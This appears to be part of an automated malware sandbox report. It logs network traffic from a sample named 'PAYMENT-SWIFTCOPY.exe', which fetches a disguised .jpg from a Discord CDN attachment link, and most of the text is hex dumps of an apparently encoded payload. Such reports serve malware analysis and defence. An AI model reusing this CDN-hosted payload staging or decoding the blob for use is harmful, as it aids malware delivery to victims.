4d 20 55 70 20 54 4d 55 20 4f 6e 20 69 50 20 55 53 20 4d 20 55 70 20 54 4d 55 20 4f 67 20 54
                                                                                                Data Ascii: MU TiS OO US M Up TMU Mip UO US M Up TMU TPM UM US M Up TMU PT TgO US M Up TMU TPg OM US M Up TMU TgU nO US M Up TMU TnM Op US M Up TMU TOg Mg US M Up TMU MMU TSU US M Up TMU Tpp OU US M Up TMU Mgp TTg US M Up TMU Tpi Pp US M Up TMU On iP US M Up TMU Og T
                                                                                                2021-10-26 15:35:11 UTC2472INData Raw: 20 53 20 53 20 53 20 67 20 53 20 6e 53 20 67 20 4f 50 20 50 20 4d 70 20 4f 20 54 53 50 20 53 20 53 20 53 20 53 20 53 20 67 20 53 20 6e 53 20 67 20 55 50 20 50 20 69 54 20 4f 20 54 54 4d 20 53 20 53 20 53 20 53 20 53 20 67 20 53 20 6e 53 20 67 20 54 53 53 20 50 20 69 4f 20 4f 20 54 54 69 20 53 20 53 20 53 20 53 20 53 20 67 20 53 20 70 20 4d 69 20 54 50 4f 20 54 70 20 4d 54 53 20 55 20 54 54 4f 20 53 20 53 20 53 20 53 20 53 20 67 20 53 20 6e 53 20 67 20 4f 50 20 50 20 70 53 20 4f 20 54 4d 54 20 53 20 53 20 53 20 53 20 53 20 67 20 53 20 6e 53 20 67 20 55 50 20 50 20 6e 50 20 4f 20 54 4d 55 20 53 20 53 20 53 20 53 20 53 20 67 20 53 20 6e 53 20 67 20 54 53 53 20 50 20 55 50 20 4f 20 54 67 54 20 53 20 53 20 53 20 53 20 53 20 67 20 53 20 70 20 4d 69 20 54 50 4f
                                                                                                Data Ascii: S S S g S nS g OP P Mp O TSP S S S S S g S nS g UP P iT O TTM S S S S S g S nS g TSS P iO O TTi S S S S S g S p Mi TPO Tp MTS U TTO S S S S S g S nS g OP P pS O TMT S S S S S g S nS g UP P nP O TMU S S S S S g S nS g TSS P UP O TgT S S S S S g S p Mi TPO
                                                                                                2021-10-26 15:35:11 UTC2488INData Raw: 50 20 54 53 20 55 20 53 20 54 53 69 20 54 53 20 54 69 53 20 54 53 20 55 20 53 20 54 53 55 20 54 53 20 54 69 50 20 54 53 20 69 54 20 53 20 50 54 20 53 20 55 20 54 67 20 6e 67 20 53 20 50 54 20 53 20 4d 50 20 54 67 20 54 53 50 20 53 20 50 54 20 53 20 69 50 20 54 67 20 54 67 54 20 53 20 54 54 20 53 20 4d 4d 69 20 54 4d 20 54 67 54 20 53 20 54 4f 20 53 20 4d 50 50 20 54 4d 20 54 67 6e 20 53 20 50 54 20 53 20 50 55 20 54 67 20 54 70 67 20 53 20 54 54 20 53 20 4d 4d 69 20 54 4d 20 54 70 67 20 53 20 54 4f 20 53 20 4d 50 50 20 54 4d 20 54 4f 50 20 53 20 67 50 20 53 20 69 4d 20 4d 20 54 4f 50 20 53 20 69 67 20 53 20 69 4d 20 4d 20 54 4f 50 20 53 20 54 54 20 53 20 4d 4d 69 20 54 4d 20 4d 4d 6e 20 53 20 54 4f 20 53 20 4d 50 50 20 54 4d 20 4d 4d 6e 20 53 20 50 4f 20
                                                                                                Data Ascii: P TS U S TSi TS TiS TS U S TSU TS TiP TS iT S PT S U Tg ng S PT S MP Tg TSP S PT S iP Tg TgT S TT S MMi TM TgT S TO S MPP TM Tgn S PT S PU Tg Tpg S TT S MMi TM Tpg S TO S MPP TM TOP S gP S iM M TOP S ig S iM M TOP S TT S MMi TM MMn S TO S MPP TM MMn S PO
                                                                                                2021-10-26 15:35:11 UTC2504INData Raw: 54 20 53 20 54 54 50 20 54 53 54 20 54 54 70 20 4f 50 20 55 67 20 54 54 70 20 4f 6e 20 54 54 69 20 54 54 70 20 6e 67 20 54 54 53 20 54 53 4d 20 54 54 54 20 53 20 55 53 20 54 54 69 20 54 54 54 20 4f 4f 20 54 53 54 20 54 54 50 20 54 54 50 20 55 67 20 54 54 70 20 4f 6e 20 54 54 69 20 54 54 70 20 6e 67 20 54 54 53 20 54 53 4d 20 54 54 54 20 53 20 70 55 20 54 53 50 20 54 54 69 20 54 53 54 20 4f 4f 20 54 54 70 20 54 54 54 20 54 54 69 20 54 4d 54 20 6e 67 20 54 54 53 20 54 53 4d 20 54 54 54 20 53 20 4f 53 20 54 53 54 20 54 54 69 20 54 54 54 20 53 20 55 67 20 54 53 55 20 54 53 54 20 54 53 54 20 54 54 4d 20 53 20 55 69 20 54 54 54 20 70 6e 20 54 53 69 20 4f 6e 20 54 54 69 20 53 20 55 67 20 54 54 70 20 54 54 69 20 54 53 50 20 54 54 53 20 54 53 67 20 70 70 20 54 54
                                                                                                Data Ascii: T S TTP TST TTp OP Ug TTp On TTi TTp ng TTS TSM TTT S US TTi TTT OO TST TTP TTP Ug TTp On TTi TTp ng TTS TSM TTT S pU TSP TTi TST OO TTp TTT TTi TMT ng TTS TSM TTT S OS TST TTi TTT S Ug TSU TST TST TTM S Ui TTT pn TSi On TTi S Ug TTp TTi TSP TTS TSg pp TT
                                                                                                2021-10-26 15:35:11 UTC2520INData Raw: 55 20 4d 67 54 20 54 69 6e 20 54 67 69 20 4d 67 54 20 54 69 70 20 54 6e 55 20 4d 67 54 20 54 69 50 20 54 55 55 20 4d 67 54 20 54 69 70 20 54 67 67 20 4d 67 54 20 54 69 70 20 54 6e 70 20 4d 67 54 20 54 69 70 20 54 67 54 20 53 20 4d 67 70 20 54 50 6e 20 54 50 53 20 4d 67 70 20 54 50 6e 20 54 69 50 20 4d 67 70 20 54 50 6e 20 54 55 54 20 4d 67 70 20 54 50 70 20 54 55 55 20 4d 67 70 20 54 50 70 20 54 4f 54 20 4d 67 70 20 54 50 70 20 54 55 55 20 4d 67 70 20 54 50 6e 20 54 67 53 20 4d 67 70 20 54 50 6e 20 54 67 4d 20 4d 67 70 20 54 50 6e 20 54 4d 55 20 4d 67 70 20 54 50 6e 20 54 4d 4f 20 4d 67 70 20 54 50 6e 20 54 6e 50 20 4d 67 70 20 54 50 6e 20 54 4d 55 20 4d 67 70 20 54 50 6e 20 54 67 54 20 4d 67 70 20 54 50 70 20 54 55 4f 20 4d 67 70 20 54 50 55 20 54 67 54
                                                                                                Data Ascii: U MgT Tin Tgi MgT Tip TnU MgT TiP TUU MgT Tip Tgg MgT Tip Tnp MgT Tip TgT S Mgp TPn TPS Mgp TPn TiP Mgp TPn TUT Mgp TPp TUU Mgp TPp TOT Mgp TPp TUU Mgp TPn TgS Mgp TPn TgM Mgp TPn TMU Mgp TPn TMO Mgp TPn TnP Mgp TPn TMU Mgp TPn TgT Mgp TPp TUO Mgp TPU TgT
                                                                                                2021-10-26 15:35:11 UTC2536INData Raw: 4d 4d 50 20 54 67 54 20 54 70 4d 20 4d 4d 50 20 54 67 53 20 54 6e 69 20 4d 4d 50 20 54 67 53 20 54 55 53 20 4d 4d 50 20 54 67 53 20 54 6e 70 20 4d 4d 50 20 54 67 53 20 54 6e 6e 20 4d 4d 50 20 54 67 53 20 54 6e 69 20 4d 4d 50 20 54 67 54 20 54 67 50 20 4d 4d 50 20 54 67 54 20 54 69 70 20 4d 4d 50 20 54 67 54 20 54 70 53 20 4d 4d 50 20 54 67 54 20 54 70 4d 20 4d 4d 50 20 54 67 54 20 54 67 4f 20 53 20 4d 67 54 20 54 69 54 20 54 69 4f 20 4d 67 54 20 54 69 54 20 54 69 4f 20 4d 67 54 20 54 69 54 20 54 4f 53 20 4d 67 54 20 54 69 54 20 54 50 70 20 4d 67 54 20 54 69 54 20 54 69 4f 20 4d 67 54 20 54 69 54 20 54 69 4f 20 4d 67 54 20 54 69 4d 20 54 67 55 20 4d 67 54 20 54 69 54 20 54 50 4d 20 4d 67 54 20 54 69 4d 20 54 67 4f 20 4d 67 54 20 54 69 4d 20 54 50 4f 20 4d
                                                                                                Data Ascii: MMP TgT TpM MMP TgS Tni MMP TgS TUS MMP TgS Tnp MMP TgS Tnn MMP TgS Tni MMP TgT TgP MMP TgT Tip MMP TgT TpS MMP TgT TpM MMP TgT TgO S MgT TiT TiO MgT TiT TiO MgT TiT TOS MgT TiT TPp MgT TiT TiO MgT TiT TiO MgT TiM TgU MgT TiT TPM MgT TiM TgO MgT TiM TPO M
                                                                                                2021-10-26 15:35:11 UTC2552INData Raw: 50 20 54 55 53 20 54 55 4f 20 4d 67 50 20 54 55 53 20 54 55 6e 20 4d 67 50 20 54 55 53 20 54 69 50 20 4d 67 50 20 54 55 53 20 54 50 6e 20 4d 67 50 20 54 55 53 20 54 69 50 20 4d 67 50 20 54 55 53 20 54 69 69 20 4d 67 50 20 54 55 53 20 54 69 67 20 4d 67 50 20 54 55 54 20 54 67 4d 20 4d 67 50 20 54 55 53 20 54 69 53 20 4d 67 50 20 54 55 53 20 54 67 4f 20 4d 67 50 20 54 55 53 20 54 69 70 20 53 20 4d 4d 50 20 54 55 4d 20 54 67 53 20 4d 4d 50 20 54 55 54 20 54 4f 54 20 4d 4d 50 20 54 55 54 20 54 69 50 20 4d 4d 50 20 54 55 54 20 54 69 54 20 4d 4d 50 20 54 55 54 20 54 69 67 20 4d 4d 50 20 54 55 54 20 54 69 50 20 4d 4d 50 20 54 55 4d 20 54 67 6e 20 4d 4d 50 20 54 55 54 20 54 69 69 20 4d 4d 50 20 54 55 54 20 54 4f 54 20 4d 4d 50 20 54 55 54 20 54 55 4f 20 4d 4d 50
                                                                                                Data Ascii: P TUS TUO MgP TUS TUn MgP TUS TiP MgP TUS TPn MgP TUS TiP MgP TUS Tii MgP TUS Tig MgP TUT TgM MgP TUS TiS MgP TUS TgO MgP TUS Tip S MMP TUM TgS MMP TUT TOT MMP TUT TiP MMP TUT TiT MMP TUT Tig MMP TUT TiP MMP TUM Tgn MMP TUT Tii MMP TUT TOT MMP TUT TUO MMP
                                                                                                2021-10-26 15:35:11 UTC2568INData Raw: 54 6e 70 20 54 70 69 20 4d 4d 50 20 54 6e 70 20 54 70 67 20 4d 4d 50 20 54 6e 70 20 54 6e 54 20 4d 4d 50 20 54 6e 70 20 54 70 55 20 4d 4d 50 20 54 6e 70 20 54 6e 53 20 4d 4d 50 20 54 6e 6e 20 54 67 4d 20 4d 4d 50 20 54 6e 70 20 54 70 6e 20 4d 4d 50 20 54 6e 6e 20 54 50 53 20 4d 4d 50 20 54 6e 6e 20 54 50 54 20 4d 4d 50 20 54 6e 6e 20 54 50 50 20 4d 4d 50 20 54 6e 70 20 54 70 69 20 4d 4d 50 20 54 6e 6e 20 54 50 67 20 53 20 4d 67 4d 20 54 6e 6e 20 54 50 4d 20 4d 67 4d 20 54 6e 6e 20 54 50 69 20 4d 67 4d 20 54 6e 6e 20 54 50 55 20 4d 67 4d 20 54 6e 6e 20 54 55 69 20 4d 67 4d 20 54 6e 55 20 54 69 4d 20 4d 67 4d 20 54 6e 6e 20 54 50 4d 20 4d 67 4d 20 54 6e 6e 20 54 50 67 20 4d 67 4d 20 54 6e 55 20 54 70 53 20 4d 67 4d 20 54 6e 6e 20 54 50 4f 20 4d 67 4d 20 54
                                                                                                Data Ascii: Tnp Tpi MMP Tnp Tpg MMP Tnp TnT MMP Tnp TpU MMP Tnp TnS MMP Tnn TgM MMP Tnp Tpn MMP Tnn TPS MMP Tnn TPT MMP Tnn TPP MMP Tnp Tpi MMP Tnn TPg S MgM Tnn TPM MgM Tnn TPi MgM Tnn TPU MgM Tnn TUi MgM TnU TiM MgM Tnn TPM MgM Tnn TPg MgM TnU TpS MgM Tnn TPO MgM T
                                                                                                2021-10-26 15:35:11 UTC2584INData Raw: 54 50 70 20 4d 4d 55 20 54 69 50 20 54 70 54 20 53 20 4d 4d 4f 20 54 69 70 20 54 69 54 20 4d 4d 4f 20 54 69 50 20 54 70 54 20 4d 4d 4f 20 54 69 50 20 54 4f 54 20 4d 4d 4f 20 54 69 50 20 54 6e 55 20 4d 4d 4f 20 54 69 50 20 54 50 50 20 4d 4d 4f 20 54 69 50 20 54 55 6e 20 4d 4d 4f 20 54 69 50 20 54 55 67 20 4d 4d 4f 20 54 69 70 20 54 69 67 20 4d 4d 4f 20 54 69 50 20 54 50 69 20 4d 4d 4f 20 54 69 50 20 54 50 4f 20 4d 4d 4f 20 54 69 70 20 54 69 67 20 4d 4d 4f 20 54 69 50 20 54 70 54 20 4d 4d 4f 20 54 69 50 20 54 50 50 20 4d 4d 4f 20 54 69 50 20 54 50 4f 20 4d 4d 4f 20 54 69 70 20 54 70 54 20 53 20 4d 67 70 20 54 50 4d 20 54 50 6e 20 4d 67 70 20 54 50 54 20 54 70 69 20 4d 67 70 20 54 50 54 20 54 50 70 20 4d 67 70 20 54 50 54 20 54 70 67 20 4d 67 70 20 54 50 54
                                                                                                Data Ascii: TPp MMU TiP TpT S MMO Tip TiT MMO TiP TpT MMO TiP TOT MMO TiP TnU MMO TiP TPP MMO TiP TUn MMO TiP TUg MMO Tip Tig MMO TiP TPi MMO TiP TPO MMO Tip Tig MMO TiP TpT MMO TiP TPP MMO TiP TPO MMO Tip TpT S Mgp TPM TPn Mgp TPT Tpi Mgp TPT TPp Mgp TPT Tpg Mgp TPT
                                                                                                2021-10-26 15:35:11 UTC2600INData Raw: 4d 67 50 20 54 55 4d 20 54 70 70 20 53 20 4d 4d 69 20 54 55 50 20 54 70 6e 20 4d 4d 69 20 54 55 50 20 54 70 50 20 4d 4d 69 20 54 55 50 20 54 70 69 20 4d 4d 69 20 54 55 50 20 54 55 67 20 4d 4d 69 20 54 55 50 20 54 6e 4d 20 4d 4d 69 20 54 55 70 20 54 50 55 20 4d 4d 69 20 54 55 70 20 54 50 53 20 4d 4d 69 20 54 55 70 20 54 69 4f 20 4d 4d 69 20 54 55 50 20 54 6e 4d 20 4d 4d 69 20 54 55 50 20 54 6e 53 20 4d 4d 69 20 54 55 50 20 54 70 6e 20 4d 4d 69 20 54 55 50 20 54 6e 4d 20 4d 4d 69 20 54 55 50 20 54 6e 54 20 4d 4d 69 20 54 55 70 20 54 50 4d 20 4d 4d 69 20 54 55 50 20 54 70 70 20 53 20 4d 4d 6e 20 54 55 4f 20 54 67 4f 20 4d 4d 6e 20 54 55 4f 20 54 55 50 20 4d 4d 6e 20 54 55 4f 20 54 69 54 20 4d 4d 6e 20 54 55 4f 20 54 67 69 20 4d 4d 6e 20 54 55 4f 20 54 67 4f
                                                                                                Data Ascii: MgP TUM Tpp S MMi TUP Tpn MMi TUP TpP MMi TUP Tpi MMi TUP TUg MMi TUP TnM MMi TUp TPU MMi TUp TPS MMi TUp TiO MMi TUP TnM MMi TUP TnS MMi TUP Tpn MMi TUP TnM MMi TUP TnT MMi TUp TPM MMi TUP Tpp S MMn TUO TgO MMn TUO TUP MMn TUO TiT MMn TUO Tgi MMn TUO TgO
                                                                                                2021-10-26 15:35:11 UTC2616INData Raw: 54 50 55 20 54 6e 69 20 53 20 4d 4d 6e 20 54 70 4f 20 54 70 70 20 4d 4d 6e 20 54 70 55 20 54 6e 70 20 4d 4d 6e 20 54 70 4f 20 54 4d 55 20 4d 4d 6e 20 54 70 55 20 54 6e 53 20 4d 4d 6e 20 54 70 55 20 54 6e 67 20 4d 4d 6e 20 54 70 4f 20 54 50 6e 20 4d 4d 6e 20 54 70 4f 20 54 6e 55 20 4d 4d 6e 20 54 70 4f 20 54 50 55 20 4d 4d 6e 20 54 70 55 20 54 70 55 20 4d 4d 6e 20 54 70 55 20 54 70 55 20 4d 4d 6e 20 54 70 55 20 54 6e 50 20 4d 4d 6e 20 54 70 55 20 54 6e 50 20 4d 4d 6e 20 54 70 4f 20 54 50 6e 20 4d 4d 6e 20 54 70 55 20 54 70 4f 20 4d 4d 6e 20 54 70 55 20 54 6e 69 20 53 20 4d 67 69 20 54 6e 4d 20 54 70 4d 20 4d 67 69 20 54 6e 4d 20 54 70 67 20 4d 67 69 20 54 6e 4d 20 54 69 70 20 4d 67 69 20 54 6e 4d 20 54 70 4d 20 4d 67 69 20 54 6e 54 20 54 6e 4f 20 4d 67 69
                                                                                                Data Ascii: TPU Tni S MMn TpO Tpp MMn TpU Tnp MMn TpO TMU MMn TpU TnS MMn TpU Tng MMn TpO TPn MMn TpO TnU MMn TpO TPU MMn TpU TpU MMn TpU TpU MMn TpU TnP MMn TpU TnP MMn TpO TPn MMn TpU TpO MMn TpU Tni S Mgi TnM TpM Mgi TnM Tpg Mgi TnM Tip Mgi TnM TpM Mgi TnT TnO Mgi
                                                                                                2021-10-26 15:35:11 UTC2632INData Raw: 69 20 54 55 70 20 4d 67 50 20 54 55 69 20 54 55 4d 20 4d 67 50 20 54 55 69 20 54 55 67 20 4d 67 50 20 54 55 50 20 54 6e 54 20 4d 67 50 20 54 55 69 20 54 55 50 20 4d 67 50 20 54 55 69 20 54 55 50 20 4d 67 50 20 54 55 50 20 54 6e 53 20 4d 67 50 20 54 55 50 20 54 55 6e 20 4d 67 50 20 54 55 50 20 54 50 6e 20 4d 67 50 20 54 55 50 20 54 70 50 20 4d 67 50 20 54 55 69 20 54 55 53 20 53 20 4d 67 50 20 54 55 4f 20 54 69 4d 20 4d 67 50 20 54 55 4f 20 54 69 67 20 4d 67 50 20 54 4f 53 20 54 50 53 20 4d 67 50 20 54 4f 53 20 54 4d 55 20 4d 67 50 20 54 4f 53 20 54 69 69 20 4d 67 50 20 54 55 4f 20 54 69 4d 20 4d 67 50 20 54 4f 53 20 54 4d 55 20 4d 67 50 20 54 55 4f 20 54 69 54 20 4d 67 50 20 54 55 4f 20 54 70 53 20 4d 67 50 20 54 55 4f 20 54 55 4f 20 4d 67 50 20 54 4f 53
                                                                                                Data Ascii: i TUp MgP TUi TUM MgP TUi TUg MgP TUP TnT MgP TUi TUP MgP TUi TUP MgP TUP TnS MgP TUP TUn MgP TUP TPn MgP TUP TpP MgP TUi TUS S MgP TUO TiM MgP TUO Tig MgP TOS TPS MgP TOS TMU MgP TOS Tii MgP TUO TiM MgP TOS TMU MgP TUO TiT MgP TUO TpS MgP TUO TUO MgP TOS
                                                                                                2021-10-26 15:35:11 UTC2648INData Raw: 55 20 53 20 4d 67 50 20 54 50 6e 20 54 70 6e 20 4d 67 50 20 54 50 55 20 54 69 55 20 4d 67 50 20 54 50 6e 20 54 6e 54 20 4d 67 50 20 54 50 6e 20 54 4f 53 20 4d 67 50 20 54 50 55 20 54 50 6e 20 4d 67 50 20 54 50 6e 20 54 70 50 20 4d 67 50 20 54 50 6e 20 54 55 4f 20 4d 67 50 20 54 50 55 20 54 50 55 20 4d 67 50 20 54 50 55 20 54 70 69 20 4d 67 50 20 54 50 55 20 54 67 54 20 4d 67 50 20 54 50 6e 20 54 6e 53 20 4d 67 50 20 54 50 6e 20 54 70 6e 20 4d 67 50 20 54 50 55 20 54 50 53 20 4d 67 50 20 54 50 6e 20 54 70 67 20 4d 67 50 20 54 50 6e 20 54 55 55 20 53 20 4d 67 4f 20 54 70 54 20 54 69 4d 20 4d 67 4f 20 54 70 54 20 54 55 70 20 4d 67 4f 20 54 70 54 20 54 69 4d 20 4d 67 4f 20 54 70 54 20 54 67 4f 20 4d 67 4f 20 54 70 54 20 54 6e 54 20 4d 67 4f 20 54 70 54 20 54
                                                                                                Data Ascii: U S MgP TPn Tpn MgP TPU TiU MgP TPn TnT MgP TPn TOS MgP TPU TPn MgP TPn TpP MgP TPn TUO MgP TPU TPU MgP TPU Tpi MgP TPU TgT MgP TPn TnS MgP TPn Tpn MgP TPU TPS MgP TPn Tpg MgP TPn TUU S MgO TpT TiM MgO TpT TUp MgO TpT TiM MgO TpT TgO MgO TpT TnT MgO TpT T
                                                                                                2021-10-26 15:35:11 UTC2664INData Raw: 20 55 4d 20 53 20 54 53 50 20 53 20 69 55 20 53 20 55 50 20 53 20 6e 67 20 53 20 6e 70 20 53 20 55 4d 20 53 20 70 50 20 53 20 70 70 20 53 20 70 50 20 53 20 70 50 20 53 20 70 70 20 53 20 55 69 20 53 20 55 70 20 53 20 54 53 55 20 53 20 54 53 54 20 53 20 6e 70 20 53 20 50 70 20 53 20 55 54 20 53 20 69 67 20 53 20 70 4f 20 53 20 54 4d 53 20 53 20 55 54 20 53 20 70 4f 20 53 20 70 50 20 53 20 70 50 20 53 20 70 4f 20 53 20 54 53 67 20 53 20 55 53 20 53 20 54 53 69 20 53 20 6e 4d 20 53 20 50 70 20 53 20 70 70 20 53 20 70 50 20 53 20 70 50 20 53 20 70 6e 20 53 20 70 55 20 53 20 50 69 20 53 20 70 6e 20 53 20 4f 4f 20 53 20 55 53 20 53 20 54 53 69 20 53 20 70 70 20 53 20 54 53 67 20 53 20 70 70 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 54 54 70 20 53 20
                                                                                                Data Ascii: UM S TSP S iU S UP S ng S np S UM S pP S pp S pP S pP S pp S Ui S Up S TSU S TST S np S Pp S UT S ig S pO S TMS S UT S pO S pP S pP S pO S TSg S US S TSi S nM S Pp S pp S pP S pP S pn S pU S Pi S pn S OO S US S TSi S pp S TSg S pp S pP S pP S pP S TTp S
                                                                                                2021-10-26 15:35:11 UTC2680INData Raw: 54 53 67 20 53 20 70 50 20 53 20 70 50 20 53 20 55 50 20 53 20 55 6e 20 53 20 54 53 69 20 53 20 70 50 20 53 20 54 4d 54 20 53 20 70 4f 20 53 20 70 50 20 53 20 70 50 20 53 20 54 53 50 20 53 20 50 70 20 53 20 50 50 20 53 20 69 6e 20 53 20 55 50 20 53 20 70 70 20 53 20 70 6e 20 53 20 70 55 20 53 20 54 53 4d 20 53 20 55 54 20 53 20 54 53 67 20 53 20 70 50 20 53 20 54 53 53 20 53 20 6e 53 20 53 20 6e 55 20 53 20 54 54 54 20 53 20 55 55 20 53 20 6e 6e 20 53 20 54 53 69 20 53 20 70 50 20 53 20 70 50 20 53 20 6e 67 20 53 20 54 54 55 20 53 20 6e 54 20 53 20 50 69 20 53 20 55 53 20 53 20 55 6e 20 53 20 6e 54 20 53 20 70 50 20 53 20 70 50 20 53 20 70 6e 20 53 20 6e 55 20 53 20 55 4d 20 53 20 54 53 53 20 53 20 54 4d 4d 20 53 20 54 54 54 20 53 20 54 54 69 20 53 20 55
                                                                                                Data Ascii: TSg S pP S pP S UP S Un S TSi S pP S TMT S pO S pP S pP S TSP S Pp S PP S in S UP S pp S pn S pU S TSM S UT S TSg S pP S TSS S nS S nU S TTT S UU S nn S TSi S pP S pP S ng S TTU S nT S Pi S US S Un S nT S pP S pP S pn S nU S UM S TSS S TMM S TTT S TTi S U


                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                3192.168.2.549753162.159.130.233443C:\Users\user\Desktop\PAYMENT-SWIFTCOPY.exe
                                                                                                TimestampkBytes transferredDirectionData
                                                                                                2021-10-26 15:35:12 UTC2681OUTGET /attachments/893177342426509335/902539097346814013/779A1864.jpg HTTP/1.1
                                                                                                Host: cdn.discordapp.com
                                                                                                2021-10-26 15:35:12 UTC2681INHTTP/1.1 200 OK
                                                                                                Date: Tue, 26 Oct 2021 15:35:12 GMT
                                                                                                Content-Type: image/jpeg
                                                                                                Content-Length: 693967
                                                                                                Connection: close
                                                                                                CF-Ray: 6a44c0ce69ca4ea3-FRA
                                                                                                Accept-Ranges: bytes
                                                                                                Age: 2118
                                                                                                Cache-Control: public, max-age=31536000
                                                                                                ETag: "23a5250b8d90156e7d3cdf648d28e9da"
                                                                                                Expires: Wed, 26 Oct 2022 15:35:12 GMT
                                                                                                Last-Modified: Tue, 26 Oct 2021 12:48:09 GMT
                                                                                                Vary: Accept-Encoding
                                                                                                CF-Cache-Status: HIT
                                                                                                Alt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                                                                                                Cf-Bgj: h2pri
                                                                                                Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                                x-goog-generation: 1635252489262793
                                                                                                x-goog-hash: crc32c=la2Ogw==
                                                                                                x-goog-hash: md5=I6UlC42QFW59PN9kjSjp2g==
                                                                                                x-goog-metageneration: 1
                                                                                                x-goog-storage-class: STANDARD
                                                                                                x-goog-stored-content-encoding: identity
                                                                                                x-goog-stored-content-length: 693967
                                                                                                X-GUploader-UploadID: ADPycdugciGjaBfm1jkRHrCGp6TL-hiSTfEGgfhLw1xDKH1ZiuRprzVhtotiFAMhjRQuGamJ9-8cZedzcbOg46e7pu4
                                                                                                X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=RfgAjj3sVP14rvYh7BGekKtQklPGfEwtMSGYcbsixyCkie8qJXin6brGKB5Pk2Y%2Fqp%2BxRNDmAzFSM1FLAv6POtGMLWQUaeQN3rPeZf4TgfoG1ShCi9jy2qAlj7RfNUeLcdNh9g%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                2021-10-26 15:35:12 UTC2682INData Raw: 4e 45 4c 3a 20 7b 22 73 75 63 63 65 73 73 5f 66 72 61 63 74 69 6f 6e 22 3a 30 2c 22 72 65 70 6f 72 74 5f 74 6f 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 22 3a 36 30 34 38 30 30 7d 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 0d 0a
                                                                                                Data Ascii: NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflare
                                                                                                2021-10-26 15:35:12 UTC2682INData Raw: 53 20 55 55 20 53 20 55 55 20 53 20 4f 4f 20 53 20 50 69 20 53 20 6e 6e 20 53 20 70 55 20 53 20 50 67 20 53 20 69 6e 20 53 20 69 6e 20 53 20 69 67 20 53 20 6e 55 20 53 20 54 53 53 20 53 20 54 53 53 20 53 20 54 4d 4d 20 53 20 54 54 54 20 53 20 54 53 6e 20 53 20 70 55 20 53 20 54 54 54 20 53 20 70 50 20 53 20 70 50 20 53 20 6e 53 20 53 20 50 67 20 53 20 4f 55 20 53 20 54 4d 54 20 53 20 4f 4f 20 53 20 6e 67 20 53 20 70 4f 20 53 20 70 50 20 53 20 6e 53 20 53 20 4f 6e 20 53 20 6e 70 20 53 20 50 70 20 53 20 6e 67 20 53 20 6e 4d 20 53 20 6e 54 20 53 20 50 4d 20 53 20 6e 53 20 53 20 55 54 20 53 20 70 50 20 53 20 70 50 20 53 20 6e 4f 20 53 20 54 53 50 20 53 20 55 50 20 53 20 6e 4f 20 53 20 54 54 4f 20 53 20 70 50 20 53 20 70 50 20 53 20 55 55 20 53 20 54 54 50 20
                                                                                                Data Ascii: S UU S UU S OO S Pi S nn S pU S Pg S in S in S ig S nU S TSS S TSS S TMM S TTT S TSn S pU S TTT S pP S pP S nS S Pg S OU S TMT S OO S ng S pO S pP S nS S On S np S Pp S ng S nM S nT S PM S nS S UT S pP S pP S nO S TSP S UP S nO S TTO S pP S pP S UU S TTP
                                                                                                2021-10-26 15:35:12 UTC2683INData Raw: 20 53 20 50 54 20 53 20 55 50 20 53 20 55 50 20 53 20 6e 6e 20 53 20 50 6e 20 53 20 54 54 70 20 53 20 55 69 20 53 20 4f 6e 20 53 20 54 53 69 20 53 20 70 55 20 53 20 69 6e 20 53 20 6e 53 20 53 20 4f 55 20 53 20 70 55 20 53 20 70 50 20 53 20 55 54 20 53 20 70 50 20 53 20 70 50 20 53 20 50 50 20 53 20 54 54 4f 20 53 20 50 4d 20 53 20 54 53 55 20 53 20 6e 53 20 53 20 6e 53 20 53 20 70 50 20 53 20 69 67 20 53 20 70 4f 20 53 20 6e 67 20 53 20 54 54 4f 20 53 20 70 4f 20 53 20 70 50 20 53 20 70 50 20 53 20 6e 67 20 53 20 50 53 20 53 20 69 4f 20 53 20 50 70 20 53 20 6e 50 20 53 20 54 53 70 20 53 20 69 6e 20 53 20 69 6e 20 53 20 69 67 20 53 20 54 53 67 20 53 20 54 53 50 20 53 20 69 6e 20 53 20 55 53 20 53 20 69 6e 20 53 20 69 6e 20 53 20 54 53 70 20 53 20 55 50 20
                                                                                                Data Ascii: S PT S UP S UP S nn S Pn S TTp S Ui S On S TSi S pU S in S nS S OU S pU S pP S UT S pP S pP S PP S TTO S PM S TSU S nS S nS S pP S ig S pO S ng S TTO S pO S pP S pP S ng S PS S iO S Pp S nP S TSp S in S in S ig S TSg S TSP S in S US S in S in S TSp S UP
                                                                                                2021-10-26 15:35:12 UTC2685INData Raw: 20 54 53 6e 20 53 20 70 50 20 53 20 70 50 20 53 20 6e 67 20 53 20 54 54 70 20 53 20 69 4f 20 53 20 69 67 20 53 20 70 55 20 53 20 54 54 55 20 53 20 54 4d 4d 20 53 20 54 54 6e 20 53 20 6e 4f 20 53 20 54 53 70 20 53 20 70 4f 20 53 20 55 54 20 53 20 70 50 20 53 20 70 70 20 53 20 69 55 20 53 20 70 50 20 53 20 54 54 54 20 53 20 54 54 55 20 53 20 6e 54 20 53 20 54 53 70 20 53 20 55 50 20 53 20 50 54 20 53 20 50 70 20 53 20 55 50 20 53 20 55 4f 20 53 20 69 4f 20 53 20 6e 6e 20 53 20 55 53 20 53 20 54 54 4f 20 53 20 6e 69 20 53 20 55 4d 20 53 20 55 50 20 53 20 55 53 20 53 20 50 6e 20 53 20 69 4f 20 53 20 70 4f 20 53 20 55 53 20 53 20 50 6e 20 53 20 69 4f 20 53 20 6e 53 20 53 20 55 53 20 53 20 50 70 20 53 20 55 70 20 53 20 54 54 70 20 53 20 6e 6e 20 53 20 70 70 20
                                                                                                Data Ascii: TSn S pP S pP S ng S TTp S iO S ig S pU S TTU S TMM S TTn S nO S TSp S pO S UT S pP S pp S iU S pP S TTT S TTU S nT S TSp S UP S PT S Pp S UP S UO S iO S nn S US S TTO S ni S UM S UP S US S Pn S iO S pO S US S Pn S iO S nS S US S Pp S Up S TTp S nn S pp
